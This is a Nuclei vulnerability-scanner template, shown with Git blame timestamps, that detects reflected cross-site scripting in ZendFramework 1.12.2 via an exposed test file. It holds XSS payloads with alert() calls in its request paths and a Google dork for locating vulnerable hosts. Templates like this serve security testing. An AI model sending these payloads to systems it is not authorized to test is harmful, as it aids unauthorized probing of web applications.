nuclei-templates/http/vulnerabilities/zend/zend-v1-xss.yaml

47 lines
1.5 KiB
YAML
Raw Permalink Normal View History

2022-12-06 08:13:46 +00:00
id: zend-v1-xss
info:
name: ZendFramework 1.12.2 - Cross-Site Scripting
author: c3l3si4n
severity: medium
2022-12-07 13:52:26 +00:00
description: |
ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
2022-12-06 08:13:46 +00:00
reference:
- https://twitter.com/c3l3si4n/status/1600035722148212737
2024-09-10 09:08:16 +00:00
classification:
cpe: cpe:2.3:a:zend:zend_framework:1.12.2:*:*:*:*:*:*:*
2022-12-07 13:52:26 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
2024-09-10 08:22:50 +00:00
vendor: zend
2024-09-10 09:08:16 +00:00
product: zend_framework
google-query: inurl:"/tests/Zend/Http/"
2022-12-06 08:13:46 +00:00
tags: zend,zendframework,xss
http:
2022-12-06 08:13:46 +00:00
- method: GET
path:
2022-12-07 13:52:26 +00:00
- "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>"
- "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)>"
2022-12-06 08:13:46 +00:00
2022-12-07 13:52:26 +00:00
stop-at-first-match: true
2023-10-14 11:27:55 +00:00
2022-12-06 08:13:46 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-12-07 12:53:56 +00:00
- '"redirection"]'
- '"param"'
- '<img/src=x onerror=alert(document.domain)'
2022-12-06 08:13:46 +00:00
condition: and
- type: word
part: header
words:
2022-12-07 13:52:26 +00:00
- text/html
- type: status
status:
- 200
2024-09-12 05:14:01 +00:00
# digest: 490a0046304402204fac4d04a860da709b79c8383ab7f476a86fdabd2ca2a7e112be8963d552f41b02205fe70d64962747f875466681c335ca9edbcb776bfe317071ea17bad4ba8fb241:922c64590222798bb761d5b6d8e72950